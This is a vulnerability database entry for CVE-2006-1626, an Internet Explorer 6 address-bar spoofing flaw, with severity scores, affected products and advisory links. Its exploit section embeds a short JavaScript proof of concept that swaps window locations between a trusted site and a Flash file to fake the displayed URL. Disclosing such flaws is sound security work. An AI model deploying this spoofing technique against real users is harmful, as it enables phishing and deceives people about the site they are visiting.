CVE-2006-1626 : Detail

CVE-2006-1626

A03-Injection
53.05%V4
Network
2006-04-05
08h00 +00:00
2018-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Internet Explorer 6 for Windows XP SP2 and earlier allows remote attackers to spoof the address bar and possibly conduct phishing attacks by re-opening the window to a malicious Shockwave Flash application, then changing the window location back to a trusted URL while the Flash application is still loading. NOTE: this is a different vulnerability than CVE-2006-1192.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 27577

Publication date : 2006-04-02 22h00 +00:00
Author : Hai Nam Luke
EDB Verified : Yes

source: https://www.securityfocus.com/bid/17404/info Internet Explorer is prone to address-bar spoofing. An attacker can exploit this issue to display the URI of a trusted and known site in the address bar, while running an attacker-supplied Macromedia Flash application. This may aid in phishing-style attacks and possibly allow access to properties of the trusted domain. <script language="javascript"> function pause(ms) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < ms); } function spoof () { win = window.open('http://www.microsoft.com/','new') pause (2000) win = window.open('http://www.example.com/swfs/index.swf','new') pause (2000) win = window.open('http://www.microsoft.com/','new') } </script> <a href="javascript: spoof()">Perform the test</a>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0

Microsoft>>Windows_xp >> Version *

References

http://www.securityfocus.com/bid/17404
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2006/2319
Tags : vdb-entry, x_refsource_VUPEN
http://securitytracker.com/id?1016291
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2006/1218
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/19521
Tags : third-party-advisory, x_refsource_SECUNIA